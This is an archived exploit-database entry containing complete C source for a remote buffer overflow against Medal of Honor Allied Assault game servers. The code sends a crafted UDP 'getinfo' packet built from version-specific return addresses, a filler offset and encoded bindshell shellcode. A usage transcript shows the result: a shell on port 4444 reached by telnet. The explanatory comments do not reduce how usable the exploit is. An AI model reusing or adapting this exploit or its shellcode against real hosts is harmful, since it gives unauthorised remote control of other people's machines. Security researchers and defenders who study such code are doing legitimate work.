Medal of Honor - 'getinfo' Remote Buffer Overflow

EDB-ID:

1776

CVE:

N/A




Platform:

Windows

Date:

2006-05-10


/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon

Please use this responsibly, as I am not responsible for any damage you cause by using it.

IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com

Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)

Example:

C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.

C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

// One supported server build: the version string the user types and the two
// numbers Exploit() needs to lay out the packet for it.
// Versions[] initialises this positionally, so the field order matters.
struct VersionStruct {
    char *pName;          // version name given as argv[3]; matched case-insensitively in main()
    DWORD dwNewEIP;       // value placed immediately after the filler (the intended new EIP);
                          // Exploit() memcpy()s it straight from memory, so it goes out in host byte order
    DWORD dwFillLength;   // number of 'z' bytes between the "getinfo " header and dwNewEIP
};

// Per-build overflow parameters, one entry per supported server version.
// Fields follow VersionStruct positionally: the name (matched case-insensitively
// against argv[3] in main()), the return-address value (dwNewEIP) and the number
// of 'z' filler bytes that precede it. Both builds listed here share the
// 516-byte offset; only the address differs.
VersionStruct Versions[] = {
    { "MOHAA-v1.11",   0xCBB935, 516 },
    { "MOHAA:S-v2.15", 0x923575, 516 },
    // TODO: add MOHAA:Breakthrough support
};

#pragma comment (lib, "ws2_32.lib")

// Port 4444 bindshell.
// Opaque payload bytes; the file header credits Metasploit, and the opening
// bytes look like a self-decoding encoder stub (fnstenv GetPC + XOR loop), so
// the actual shell logic cannot be audited from this listing -- confirm against
// the generator before trusting it. Exploit() copies the whole array into the
// packet verbatim, NUL terminator included (sizeof, not strlen).
// NOTE(review): the resulting listener on TCP/4444 is unauthenticated -- anyone
// who can reach that port on the target gets the same shell shown in the usage
// example. Only use against hosts you own and close the shell promptly.
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";

// Report a fatal condition on stdout (the same stream as the progress
// messages) and terminate the process. Never returns, so the `return 0;`
// statements callers place after it are unreachable defensive code.
// Note the exit status is 0 even on failure.
void Error(char *pString)
{
    fprintf(stdout, "[ERROR] %s\n", pString);
    ExitProcess(0);
}

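/*
 * Build and send the single UDP "getinfo" datagram that triggers the overflow.
 *
 * pIP      - target IPv4 address in dotted-quad form (parsed by inet_addr()).
 * iPort    - target UDP port; must be in 1..65535.
 * pVersion - Versions[] entry supplying the filler length and return address.
 *
 * On-wire layout, in order:
 *   "\xff\xff\xff\xff\x02getinfo "   (13 bytes; the string's NUL is not sent)
 *   dwFillLength bytes of 'z'
 *   dwNewEIP, copied byte-for-byte from memory (host byte order)
 *   szShellcode, including its terminating NUL
 *
 * Returns 1 once sendto() has accepted the datagram, 0 on any failure (Error()
 * normally terminates the process before the return is reached). UDP gives no
 * delivery or execution feedback: "sent" only means the packet left this host.
 * The socket and Winsock are released on every path.
 */
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
    WSAData WSADATA;
    SOCKET Socket = INVALID_SOCKET;
    sockaddr_in SockAddr;
    char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
    char szBuffer[4096];
    int iLen = 0;
    size_t cbHeader = sizeof(szHeader) - 1;    /* do not send the NUL */
    size_t cbTotal = 0;

    if(iPort < 1 || iPort > 65535)
    {
        Error("Port must be between 1 and 65535.");
        return 0;
    }

    /* Bound the payload against szBuffer before building it. The table is
     * trusted today, but a future entry with a large dwFillLength would
     * otherwise overflow this tool's own stack. Checking dwFillLength alone
     * first keeps the sum below from wrapping on a 32-bit size_t. */
    if(pVersion->dwFillLength > sizeof(szBuffer))
    {
        Error("dwFillLength exceeds send buffer.");
        return 0;
    }
    cbTotal = cbHeader + pVersion->dwFillLength + sizeof(DWORD) + sizeof(szShellcode);
    if(cbTotal > sizeof(szBuffer))
    {
        Error("Payload does not fit in send buffer.");
        return 0;
    }

    if(WSAStartup(MAKEWORD(1, 1), &WSADATA) != 0)
    {
        Error("WSAStartup()");
        return 0;
    }

    /* socket() reports failure as INVALID_SOCKET, not SOCKET_ERROR. */
    if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET)
    {
        WSACleanup();
        Error("socket()");
        return 0;
    }

    /* Zero the whole address (including sin_zero) instead of leaving
     * uninitialised stack bytes in it. */
    memset(&SockAddr, 0, sizeof(SockAddr));
    SockAddr.sin_family = AF_INET;
    SockAddr.sin_port = htons((u_short)iPort);
    SockAddr.sin_addr.s_addr = inet_addr(pIP);
    /* inet_addr() has no separate error return: INADDR_NONE also matches
     * 255.255.255.255, which is not a usable unicast target here anyway. */
    if(SockAddr.sin_addr.s_addr == INADDR_NONE)
    {
        closesocket(Socket);
        WSACleanup();
        Error("inet_addr(): target must be a dotted-quad IPv4 address.");
        return 0;
    }

    printf("Building packet.\n");

    memset(szBuffer, 0, sizeof(szBuffer));

    memcpy(szBuffer, szHeader, cbHeader);
    iLen += (int)cbHeader;

    memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
    iLen += (int)pVersion->dwFillLength;

    /* Raw in-memory bytes of the DWORD, i.e. host byte order. */
    memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
    iLen += sizeof(DWORD);

    /* sizeof() deliberately includes the trailing NUL so the packet is
     * byte-identical to the one the table offsets were tuned against. */
    memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
    iLen += sizeof(szShellcode);

    printf("Sending packet.\n");

    if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
    {
        closesocket(Socket);
        WSACleanup();
        Error("sendto()");
        return 0;
    }

    printf("Packet sent.\n");

    closesocket(Socket);
    WSACleanup();

    return 1;
}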

// Print the startup banner (the first four lines of the example session in
// the file header) followed by a blank line. Output goes to stdout.
void PrintWelcome()
{
    static const char szBanner[] =
        "MoHAA Server Buffer overflow exploit\n"
        "Written by RunningBon\n"
        "E-Mail: runningbon@gmail.com\n"
        "IRC: irc.rizon.net #kik\n"
        "\n";

    fputs(szBanner, stdout);
}

// Show the command-line syntax and the version names main() will accept.
// pPath is argv[0] and is echoed verbatim into the usage line.
void PrintUsage(char *pPath)
{
    const size_t nVersions = sizeof(Versions) / sizeof(Versions[0]);
    const VersionStruct *pEntry = Versions;

    printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);
    printf("Supported Version List:\n");

    // One name per line, exactly as it must be spelled on the command line.
    while(pEntry != Versions + nVersions)
    {
        puts(pEntry->pName);
        pEntry++;
    }
}

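/*
 * Entry point: validates the command line, resolves the version name to a
 * Versions[] entry and hands off to Exploit().
 *
 * argv[1] - target IPv4 address (dotted quad; validated inside Exploit()).
 * argv[2] - target UDP port, 1..65535.
 * argv[3] - version name, matched case-insensitively against Versions[].
 *
 * Returns 0 in every case; Error() terminates the process on bad input.
 */
int main(int argc, char **argv)
{
    VersionStruct *pVersion = NULL;
    char *pEnd = NULL;
    long lPort = 0;
    size_t i;

    PrintWelcome();

    if(argc < 4)
    {
        PrintUsage(argv[0]);
        return 0;
    }

    /* strtol instead of atoi so trailing garbage ("12abc"), an empty string
     * and out-of-range values are rejected instead of silently becoming
     * port 0 or a truncated number. */
    lPort = strtol(argv[2], &pEnd, 10);
    if(pEnd == argv[2] || *pEnd != '\0' || lPort < 1 || lPort > 65535)
    {
        Error("Invalid port (expected 1-65535).");
        return 0;
    }

    for(i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
    {
        if(!stricmp(argv[3], Versions[i].pName))
        {
            pVersion = &Versions[i];
            break;
        }
    }

    if(pVersion == NULL)
    {
        Error("Invalid version.");
        return 0;
    }

    printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], (int)lPort, pVersion->pName);

    if(Exploit(argv[1], (int)lPort, pVersion))
    {
        printf("Check for your shell on port 4444.\n");
    }

    return 0;
}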

// milw0rm.com [2006-05-10]